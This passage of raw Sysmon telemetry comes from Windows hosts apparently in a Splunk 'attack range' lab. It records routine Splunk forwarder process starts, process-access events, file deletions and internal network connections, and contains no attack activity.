14:20:51.627{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044733Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:51.627{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044732Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:51.627{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044731Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:51.627{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044730Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:51.627{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044729Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:51.627{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044728Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:51.627{0A5DF930-E35B-6299-0500-000000006002}412528C:\Windows\system32\csrss.exe{0A5DF930-18C3-629A-2E07-000000006002}2524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044727Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:51.627{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-18C3-629A-2E07-000000006002}2524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044726Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:51.628{0A5DF930-18C3-629A-2E07-000000006002}2524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000205902Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:51.388{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEC679494286B173118F709B68A9DBD5,SHA256=38B25F6E0109D2B0FC0C59FD9826DDD5C52299997B89F8CA7B86BD12548D2B32,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044725Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.572{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52376-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x800000000000000044724Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:51.127{0A5DF930-18C2-629A-2D07-000000006002}34483904C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044754Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:52.924{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=034559951BE5BBF992F11E249B952436,SHA256=677951BAFDEF6AC8B2DECD0F4C5AA7C2D9D32B4FE3EE6B2D16CFBEF4B0939AA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205903Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:52.418{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDDB44244A9789631AD54A84A5D14567,SHA256=E35CB63D1981FDDDE86CF666E634E89D314BF8E6E773EC5BA2079F522072332C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044753Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:52.627{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-18C4-629A-2F07-000000006002}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044752Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:52.627{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044751Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:52.627{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044750Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:52.627{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044749Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:52.627{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044748Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:52.627{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044747Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:52.627{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044746Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:52.627{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044745Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:52.627{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044744Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:52.627{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044743Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:52.627{0A5DF930-E35B-6299-0500-000000006002}412948C:\Windows\system32\csrss.exe{0A5DF930-18C4-629A-2F07-000000006002}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044742Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:52.627{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-18C4-629A-2F07-000000006002}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044741Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:52.628{0A5DF930-18C4-629A-2F07-000000006002}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000205905Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:51.697{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56416-false10.0.1.12-8000- 23542300x8000000000000000205904Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:53.550{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=009DB0A54EC4A5B2503C246D329C4098,SHA256=3122E7D9B885379AD26583D349C02FB25AD893A7DC1000522FDF4842C65120B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205906Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:54.645{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62D2C687848573C65B9D6D0ACB00EB05,SHA256=466299E950FD940A004FE772AB207D0FDEFE99C7A02EC049291DBDBD7A9CD176,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044755Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:54.002{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program 